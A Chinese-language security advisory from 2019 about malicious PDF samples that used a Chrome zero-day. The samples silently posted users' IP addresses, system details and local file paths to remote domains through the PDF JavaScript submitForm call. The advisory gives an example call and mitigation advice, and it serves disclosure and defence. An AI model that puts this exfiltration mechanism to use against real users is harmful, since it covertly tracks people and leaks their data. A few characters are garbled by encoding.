惡意PDF文件利用Chrome瀏覽器0day漏洞安全通告

發布時間 2019-03-01

漏洞編號和級別


CVE編號:暫無,危險級別:高危, CVSS分值:官方未評定


影響范圍


受影響版本: 


Google Chrome瀏覽器所有版本


漏洞概述


近期,來自國外的安全研究人員在野外檢測到多個PDF惡意樣本。這些樣本利用了Chrome瀏覽器的0day漏洞,以實現追蹤用戶并悄悄某些收集用戶信息的目的。


目前發現了兩組利用Chrome零日漏洞的惡意PDF文件,其中一組文件在201710月傳播,另一組文件在20189月傳播。第一批惡意PDF文件將用戶數據發送回“readnotify.com”,第二批發送回“zuxjk0dftoamimorjl9dfhr44vap3fr7ovgi76w.burpcollaborator.net”。


漏洞的根源在于this.submitForm()這個PDF Javascript API。像this.submitForm('http://google.com/test')這樣一個簡單的調用就會導致Chrome把個人信息發送到google.com??赡鼙恍孤兜男畔ǎ?


1.用戶的公共IP地址。

2.操作系統,Chrome版本等(在HTTP POST header中)。

3.用戶計算機上PDF文件的完整路徑(在HTTP POST payload中)。


當用戶使用Chrome瀏覽器打開這些惡意樣本時,樣本會運行惡意代碼,在未經用戶批準的情況下,以HTTP POST數據包的形式將一些用戶信息靜默發送到指定域“readnotify.com ”。



除去信息泄露以外,該漏洞暫未發現其它利用方式,但毫無疑問,這些泄露的用戶信息可以幫助攻擊者進行更多活動。


修復建議


目前該0day漏洞尚未有官方補丁,但Chrome團隊或許將于4月底修復該漏洞。


臨時緩解措施:

在補丁發布之前,建議用戶使用PDF閱讀器應用程序在本地查看PDF文檔,直到Chrome修復漏洞?;蛟贑hrome中打開PDF文檔時斷開計算機與Internet的連接。


參考鏈接


https://blog.edgespot.io/2019/02/edgespot-detects-pdf-zero-day-samples.html